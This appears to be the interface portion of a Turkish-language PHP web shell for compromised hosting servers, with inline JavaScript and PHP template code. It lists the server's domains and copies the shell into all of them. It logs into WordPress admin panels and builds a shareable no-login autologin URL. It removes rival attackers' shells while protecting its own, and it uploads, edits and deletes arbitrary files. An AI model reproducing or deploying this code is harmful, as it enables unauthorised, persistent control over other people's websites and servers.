background:#1e272e; padding:15px; border-radius:5px; color:#0f0; font-family:monospace; white-space:pre-wrap; max-height:500px; overflow:auto; border:1px solid #40739e; } .stats { background:#353b48; padding:10px; border-radius:5px; margin:10px 0; display:flex; gap:20px; flex-wrap:wrap; } .stat-item { flex:1; text-align:center; min-width:100px; } .stat-value { font-size:24px; font-weight:bold; color:#00a8ff; } .stat-label { font-size:12px; color:#888; } .editor-wrap textarea { width:100%; height:600px; background:#1e272e; color:#0f0; border:1px solid #40739e; border-radius:5px; padding:12px; font-family:'Courier New',monospace; font-size:13px; line-height:1.6; resize:vertical; outline:none; display:block; } 
.editor-wrap textarea:focus { border-color:#00a8ff; box-shadow:0 0 0 2px rgba(0,168,255,0.25); } </style> <script> function toggleAll(s){document.querySelectorAll("input[name='bulk_delete[]']").forEach(cb=>cb.checked=s.checked);} function toggleMalicious(s){document.querySelectorAll("input[name='selected[]']").forEach(cb=>cb.checked=s.checked);} function showRenameModal(path,name){document.getElementById('rename_old').value=path;document.getElementById('rename_new').value=name;document.getElementById('renameModal').classList.add('active');} function hideRenameModal(){document.getElementById('renameModal').classList.remove('active');} function showDomainModal(){document.getElementById('domainModal').classList.add('active');} function hideDomainModal(){document.getElementById('domainModal').classList.remove('active');} function showMaliciousModal(){document.getElementById('maliciousModal').classList.add('active');} function hideMaliciousModal(){document.getElementById('maliciousModal').classList.remove('active');} function goToDomain(path){window.location.href='?dir='+encodeURIComponent(path);} function openDomainUrl(url){window.open(url,'_blank');} function downloadFile(path){window.location.href='?download='+encodeURIComponent(path);} function analyzeFile(path){var form=document.createElement('form');form.method='post';form.innerHTML='<input name="action" value="analyze"><input name="file" value="'+path.replace(/"/g,'"')+'">';document.body.appendChild(form);form.submit();} function editFile(path){window.location.href='?editf='+btoa(unescape(encodeURIComponent(path)))+'&dir=<?php echo urlencode($current_dir); ?>';} function deployShell(){if(confirm('Tum domainlere shell kopyalansin mi? 
(flex.php)')){window.location.href='?deploy=run';}} function wpAdminLogin(path,url){ window.location.href='?wpadmin_deploy=1&wpdir='+encodeURIComponent(path)+'&wpurl='+encodeURIComponent(url); } document.addEventListener('keydown',function(e){ if(e.altKey&&!e.ctrlKey&&(e.key==='w'||e.key==='W')&&!e.target.matches('input[type="text"],input[type="password"],input[type="search"],textarea,select')){ var checked=document.querySelectorAll("input[name='bulk_delete[]']:checked:not(:disabled)"); if(!checked.length)return; e.preventDefault(); var cont=document.getElementById('twf_inputs'); cont.innerHTML=''; checked.forEach(function(cb){var h=document.createElement('input');h.type='hidden';h.name='paths[]';h.value=cb.value;cont.appendChild(h);}); document.getElementById('toggle_write_form').submit(); } }); function showAutologinUrl(){ var token='<?php echo hash("sha256",$stored_username.":script_iletisim:autologin_key"); ?>'; var base=window.location.protocol+'//'+window.location.host+window.location.pathname; var url=base+'?autologin='+token; var el=document.getElementById('autologin-url-box'); el.style.display=el.style.display==='none'?'block':'none'; document.getElementById('autologin-url-input').value=url; } function toggleSection(titleEl){ titleEl.classList.toggle('collapsed'); var body=titleEl.nextElementSibling; body.classList.toggle('collapsed'); } function copyAutologinUrl(){ var inp=document.getElementById('autologin-url-input'); inp.select();inp.setSelectionRange(0,99999);document.execCommand('copy');alert('Otologin URL kopyalandi!'); } </script> </head> <body> <div class="container"> <div style="background:#353b48; padding:5px; margin-bottom:10px; text-align:center; color:#00a8ff; font-weight:bold;"> 🔥 GELİŞMİŞ SHELL - KORUMALI | Sadece izinli dosyalar: <?php echo implode(', ', $allowed_shells); ?> </div> <h2>📁 <?php echo htmlspecialchars($current_dir); ?></h2> <div class="toolbar"> <a href="?logout=1" class="button">Çıkış</a> <?php if (dirname($current_dir) != 
$current_dir): ?> <a class="button" href="?dir=<?php echo urlencode(dirname($current_dir)); ?>">⬆ Üst Dizin</a> <?php endif; ?> <button class="success" onclick="showDomainModal()">🌐 Domainler (<?php echo count($all_domains); ?>)</button> <button class="warning" onclick="deployShell()">📋 SHELL KOPYALA (flex.php)</button> <form method="post" style="display:inline;"> <input type="hidden" name="action" value="scan"> <button type="submit" class="danger">🔍 ZARARLI SHELL TARA</button> </form> <?php if (!empty($malicious_files)): ?> <button class="danger" onclick="showMaliciousModal()">⚠️ ZARARLI SHELL'LER (<?php echo count($malicious_files); ?>)</button> <?php endif; ?> <?php if (file_exists($current_dir . '/wp-load.php')): ?> <button style="background:#8e44ad;" onclick="wpAdminLogin('<?php echo addslashes($current_dir); ?>', '<?php echo (isset($_SERVER['HTTPS']) ? 'https' : 'http') . '://' . $_SERVER['HTTP_HOST']; ?>')">🛡️ WP Admin Giriş</button> <?php endif; ?> <button class="info" onclick="showAutologinUrl()">🔑 Otologin URL</button> <span style="margin-left:auto; color:#00a8ff;">Korunan: <?php echo count($our_shells) + count($wordpress_core_files) + count($protected_files); ?> dosya</span> </div> <div id="autologin-url-box" style="display:none; background:#1e272e; border:1px solid #00a8ff; border-radius:5px; padding:10px; margin-bottom:10px; display:none;"> <div style="margin-bottom:6px; color:#00a8ff; font-size:13px;">🔑 Otologin URL — Bu linki paylaşın, giriş gerekmeden erişim sağlanır:</div> <div style="display:flex; gap:8px; align-items:center;"> <input id="autologin-url-input" type="text" readonly style="flex:1; background:#2f3640; color:#fff; border:1px solid #40739e; border-radius:4px; padding:6px 10px; font-size:12px; font-family:monospace;" value=""> <button class="success" onclick="copyAutologinUrl()" style="white-space:nowrap;">📋 Kopyala</button> </div> </div> <div id="domainModal" class="modal"> <div class="modal-content"> <h3>🌐 Sunucudaki Domainler (Tam 
URL)</h3> <div class="domain-stats"> <div class="domain-stat-box"><div class="stat-value"><?php echo count($all_domains); ?></div><div class="stat-label">Toplam Domain</div></div> <div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'https') === 0; })); ?></div><div class="stat-label">HTTPS</div></div> <div class="domain-stat-box"><div class="stat-value"><?php echo count(array_filter($all_domains, function($d) { return strpos($d['url'], 'http:') === 0; })); ?></div><div class="stat-label">HTTP</div></div> </div> <div class="domain-list"> <?php if (empty($all_domains)): ?> <p style="padding:10px;">Domain bulunamadı.</p> <?php else: ?> <?php foreach ($all_domains as $d): ?> <div class="domain-item"> <div style="flex:2;" onclick="goToDomain('<?php echo htmlspecialchars($d['path']); ?>')"> <span class="domain-url"> <?php if (strpos($d['url'], 'https') === 0): ?>🔒 <?php else: ?>🔓 <?php endif; ?> <?php echo htmlspecialchars($d['url']); ?> <span class="domain-badge <?php echo (strpos($d['url'], 'https') === 0) ? 'protocol-https' : 'protocol-http'; ?>"><?php echo (strpos($d['url'], 'https') === 0) ? 'HTTPS' : 'HTTP'; ?></span> </span> <div class="domain-path">📁 <?php echo htmlspecialchars($d['path']); ?> [<?php echo $d['type']; ?>]</div> </div> <div style="display:flex; gap:5px;"> <button class="button info" onclick="event.stopPropagation(); openDomainUrl('<?php echo htmlspecialchars($d['url']); ?>')" style="padding:4px 8px; font-size:11px;">🌐 Siteyi Aç</button> <button class="button" onclick="event.stopPropagation(); goToDomain('<?php echo htmlspecialchars($d['path']); ?>')" style="padding:4px 8px; font-size:11px;">📂 Dizine Git</button> <?php if (file_exists($d['path'] . 
'/wp-load.php')): ?> <button style="background:#8e44ad; color:#fff; border:none; padding:4px 8px; border-radius:5px; cursor:pointer; font-size:11px;" onclick="event.stopPropagation(); wpAdminLogin('<?php echo addslashes($d['path']); ?>', '<?php echo addslashes($d['url']); ?>')">🛡️ WP Admin</button> <?php endif; ?> </div> </div> <?php endforeach; ?> <?php endif; ?> </div> <div style="margin-top:15px; text-align:right;"><button onclick="hideDomainModal()">Kapat</button></div> </div> </div> <?php if (!empty($malicious_files)): ?> <div id="maliciousModal" class="modal"> <div class="modal-content"> <h3>⚠️ ZARARLI SHELL DOSYALARI</h3> <p>Toplam: <?php echo count($malicious_files); ?> zararlı dosya bulundu.</p> <form method="post"> <input type="hidden" name="action" value="delete_selected"> <table style="width:100%;"> <tr><th width="30"><input type="checkbox" onclick="toggleMalicious(this)"></th><th>Dosya</th><th>Risk</th><th width="350">İşlemler</th></tr> <?php foreach ($malicious_files as $m): ?> <tr> <td><input type="checkbox" name="selected[]" value="<?php echo htmlspecialchars($m['path']); ?>"></td> <td><strong><?php echo htmlspecialchars($m['name']); ?></strong><br><small><?php echo htmlspecialchars(substr(dirname($m['path']), 0, 50)); ?><br>Boyut: <?php echo $m['size']; ?> bytes</small></td> <td><span class="<?php echo ($m['risk'] > 70) ? 'risk-high' : (($m['risk'] > 40) ? 
'risk-medium' : 'risk-low'); ?>"><?php echo $m['risk']; ?></span></td> <td><div class="button-group"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($m['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($m['path']); ?>', '<?php echo addslashes($m['name']); ?>')">✏️ Adlandır</button><button type="button" class="analyze-btn" onclick="analyzeFile('<?php echo addslashes($m['path']); ?>')">🔍 Analiz</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($m['path']); ?>')">✏️ Düzenle</button></div></td> </tr> <?php endforeach; ?> </table> <div style="margin-top:15px; display:flex; gap:10px; justify-content:space-between;"><div><button type="submit" class="danger">🗑 SEÇİLİ ZARARLILARI SİL</button></div><div><button type="button" class="button" onclick="hideMaliciousModal()">Kapat</button></div></div> </form> </div> </div> <?php endif; ?> <form method="post" enctype="multipart/form-data" style="margin:10px 0;"> <input type="file" name="files[]" multiple> <input type="hidden" name="action" value="upload"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <button type="submit" class="success">📤 Yükle</button> </form> <form id="toggle_write_form" method="post" style="display:none;"> <input type="hidden" name="action" value="toggle_write"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div id="twf_inputs"></div> </form> <hr> <?php if (!empty($plugins['suspicious'])): ?> <div class="delete-section"> <div class="delete-title collapsed" onclick="toggleSection(this)">⚠️ ŞÜPHELİ EKLENTİLER (<?php echo count($plugins['suspicious']); ?>) - SİLİNEBİLİR <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($plugins['suspicious'] as $plugin): ?> <div class="row plugin-suspicious"> <div><input type="checkbox" 
name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></div> <div>📦 <?php echo htmlspecialchars($plugin['name']); ?><?php if ($plugin['active']): ?><span class="active-badge">AKTİF</span><?php else: ?><span class="inactive-badge">PASİF</span><?php endif; ?><span class="plugin-suspicious-badge">ŞÜPHELİ</span></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($plugin['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($plugin['path']); ?>', '<?php echo addslashes($plugin['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($plugin['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu eklentiyi silmek istediğinize emin misiniz?')) { document.getElementById('delete_form_<?php echo md5($plugin['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($plugin['path']); ?>" class="button">🔍 İncele</a></div> </div> <form id="delete_form_<?php echo md5($plugin['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($plugin['path']); ?>"></form> <?php endforeach; ?> </div> </div> <?php endif; ?> <?php if (!empty($themes['inactive'])): ?> <div class="delete-section"> <div class="delete-title collapsed" onclick="toggleSection(this)">💤 PASİF TEMALAR (<?php echo count($themes['inactive']); ?>) - SİLİNEBİLİR <span class="toggle-arrow">▼</span></div> <div class="delete-body collapsed"> <?php foreach ($themes['inactive'] as $theme): ?> <div class="row theme-inactive"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></div> <div>🎨 <?php echo htmlspecialchars($theme['name']); ?><span 
class="inactive-badge">PASİF</span></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($theme['path']); ?>')">📥 İndir</button><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($theme['path']); ?>', '<?php echo addslashes($theme['name']); ?>')">✏️ Adlandır</button><button type="button" class="edit-btn" onclick="editFile('<?php echo addslashes($theme['path']); ?>')">✏️ Düzenle</button><button type="button" class="delete-btn" onclick="if(confirm('Bu temayı silmek istediğinize emin misiniz?')) { document.getElementById('delete_theme_<?php echo md5($theme['path']); ?>').submit(); }">🗑 Sil</button><a href="?dir=<?php echo urlencode($theme['path']); ?>" class="button">🔍 İncele</a></div> </div> <form id="delete_theme_<?php echo md5($theme['path']); ?>" method="post" style="display:none;"><input type="hidden" name="action" value="bulk_delete"><input type="hidden" name="bulk_delete[]" value="<?php echo htmlspecialchars($theme['path']); ?>"></form> <?php endforeach; ?> </div> </div> <?php endif; ?> <form method="post" onsubmit="return confirm('Seçili dosya/klasörleri silmek istediğinize emin misiniz?');"> <input type="hidden" name="action" value="bulk_delete"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <div class="list-header"> <div class="select-all"><input type="checkbox" onclick="toggleAll(this)"> <strong>Tümünü Seç</strong> <span style="color:#888; font-size:12px; margin-left:10px;">(Korunan dosyalar seçilemez ve silinemez)</span></div> <button type="submit" class="button danger">Seçileni Sil</button> </div> <h3>📁 Klasörler</h3> <?php foreach ($folders as $folder): $path = $current_dir . '/' . $folder; $perm = substr(sprintf('%o', fileperms($path)), -3); $id = 'chmod_' . 
md5($path); $is_wp_dir = in_array($folder, $wordpress_core_dirs); $is_our_shell = in_array($folder, $our_shells); $is_protected = $is_wp_dir || $is_our_shell; ?> <div class="row <?php if ($is_protected) echo 'protected'; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div> <div class="name">📁 <a href="?dir=<?php echo urlencode($path); ?>"><?php echo htmlspecialchars($folder); ?></a><?php if ($is_wp_dir): ?><span class="wp-badge">WORDPRESS</span><?php endif; ?><?php if ($is_our_shell): ?><span class="our-badge">SHELL</span><?php endif; ?><?php if (!$is_protected): ?><?php if ((int)$perm[0] & 2): ?><span class="perm-open">🔓 YAZMA AÇIK</span><?php else: ?><span class="perm-closed">🔒 YAZMA KAPALI</span><?php endif; ?><?php endif; ?></div> <div class="inline-controls"><button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button><?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($folder); ?>')">✏️ Adlandır</button><?php endif; ?></div> </div> <?php endforeach; ?> <h3>📄 Dosyalar</h3> <?php foreach ($files as $file): $path = $current_dir . '/' . $file; $perm = substr(sprintf('%o', fileperms($path)), -3); $id = 'chmod_' . md5('f_'.$path); $editUrl = '?editf=' . base64_encode($path) . '&dir=' . 
urlencode($current_dir); $is_protected = false; $protected_type = ''; if (in_array($file, $protected_files)) { $is_protected = true; $protected_type = 'KORUNAN'; } elseif (in_array($file, $wordpress_core_files)) { $is_protected = true; $protected_type = 'WORDPRESS'; } elseif (in_array($file, $our_shells)) { $is_protected = true; $protected_type = 'SHELL'; } $is_malicious = false; $malicious_risk = 0; if (!$is_protected && isset($_SESSION['malicious'])) { foreach ($_SESSION['malicious'] as $m) { if ($m['path'] == $path) { $is_malicious = true; $malicious_risk = $m['risk']; break; } } } $row_class = $is_protected ? 'protected' : ($is_malicious ? 'malicious' : ''); ?> <div class="row <?php echo $row_class; ?>"> <div><input type="checkbox" name="bulk_delete[]" value="<?php echo htmlspecialchars($path); ?>" <?php if ($is_protected) echo 'disabled'; ?>></div> <div class="name">📄 <?php echo htmlspecialchars($file); ?><?php if ($protected_type): ?><span class="<?php echo ($protected_type == 'WORDPRESS') ? 'wp-badge' : (($protected_type == 'SHELL') ? 'our-badge' : 'protected-badge'); ?>"><?php echo $protected_type; ?></span><?php endif; ?><?php if ($is_malicious): ?><span class="malicious-badge">ZARARLI (<?php echo $malicious_risk; ?>)</span><?php endif; ?><?php if (!$is_protected): ?><?php if ((int)$perm[0] & 2): ?><span class="perm-open">🔓 YAZMA AÇIK</span><?php else: ?><span class="perm-closed">🔒 YAZMA KAPALI</span><?php endif; ?><?php endif; ?></div> <div class="inline-controls"> <button type="button" class="download-btn" onclick="downloadFile('<?php echo addslashes($path); ?>')">📥 İndir</button> <?php if (!$is_protected): ?><button type="button" class="rename-btn" onclick="showRenameModal('<?php echo addslashes($path); ?>', '<?php echo addslashes($file); ?>')">✏️ Adlandır</button><?php endif; ?> <a class="button" href="<?php echo $editUrl; ?>" onclick="<?php if ($is_protected) echo 'return confirm(\'Bu dosya KORUNAN bir dosyadır. 
Düzenlemek sitenin çalışmasını bozabilir. Devam etmek istediğinize emin misiniz?\');'; ?>">Düzenle</a> </div> </div> <?php endforeach; ?> <div class="list-header"><div></div><button type="submit" class="button danger">Seçileni Sil</button></div> </form> <div id="renameModal" class="modal"> <div class="modal-content"> <h3>📝 Dosya/Klasör Adını Değiştir</h3> <form method="post"> <input type="hidden" name="action" value="rename"> <input type="hidden" name="old" id="rename_old"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($current_dir); ?>"> <p style="margin-bottom:10px;">Yeni isim:</p> <input type="text" name="new" id="rename_new" required style="width:100%; padding:8px; margin-bottom:15px; background:#1e272e; color:#fff; border:1px solid #40739e; border-radius:5px;"> <div style="text-align:right; display:flex; gap:10px; justify-content:flex-end;"><button type="button" class="button" onclick="hideRenameModal()">İptal</button><button type="submit" class="success">Değiştir</button></div> </form> </div> </div> <?php $file_to_edit = null; if (isset($_GET['editf'])) { $file_to_edit = base64_decode($_GET['editf']); } elseif (isset($_GET['edit'])) { $file_to_edit = $_GET['edit']; } if ($file_to_edit && file_exists($file_to_edit)): $is_protected = in_array(basename($file_to_edit), $protected_files) || in_array(basename($file_to_edit), $wordpress_core_files) || in_array(basename($file_to_edit), $our_shells); ?> <hr> <h3>✍️ Dosyayı Düzenle: <?php echo htmlspecialchars(basename($file_to_edit)); ?></h3> <?php if ($is_protected): ?><div style="background:#e84118; padding:10px; border-radius:5px; margin-bottom:10px; color:#fff; font-weight:bold;">⚠️ UYARI: Bu dosya KORUNAN bir dosyadır. 
Düzenlemek sitenin çalışmasını bozabilir!</div><?php endif; ?> <div class="editor-wrap"> <form method="post"> <textarea name="content"><?php echo htmlspecialchars(file_get_contents($file_to_edit)); ?></textarea> <input type="hidden" name="action" value="edit"> <input type="hidden" name="file" value="<?php echo htmlspecialchars($file_to_edit); ?>"> <input type="hidden" name="current_dir" value="<?php echo htmlspecialchars($_GET['dir'] ?? $current_dir); ?>"> <div class="toolbar" style="margin-top:10px"><button class="button" type="submit">Kaydet</button><a class="button" href="?dir=<?php echo urlencode($_GET['dir'] ?? $current_dir); ?>">İptal</a></div> </form> </div> <?php endif; ?> <?php if (!empty($analysis)): ?> <hr> <h3>🔍 Dosya Analizi: <?php echo htmlspecialchars(basename($analysis_file)); ?></h3> <div class="pre-box"><?php echo nl2br(htmlspecialchars($analysis)); ?></div> <?php endif; ?> <div class="stats"> <div class="stat-item"><div class="stat-value"><?php echo count($files); ?></div><div class="stat-label">Dosya</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($folders); ?></div><div class="stat-label">Klasör</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($malicious_files); ?></div><div class="stat-label">Zararlı</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($our_shells); ?></div><div class="stat-label">Bizim Shell</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($wordpress_core_files); ?></div><div class="stat-label">WP Core</div></div> <div class="stat-item"><div class="stat-value"><?php echo count($protected_files); ?></div><div class="stat-label">Özel Koruma</div></div> </div> <div style="text-align:center; margin-top:20px; color:#888; font-size:12px;"> 🔒 Gelişmiş Shell - Sadece izinli dosyalar çalışır: <?php echo implode(', ', $allowed_shells); ?> </div> </div> </body> </html>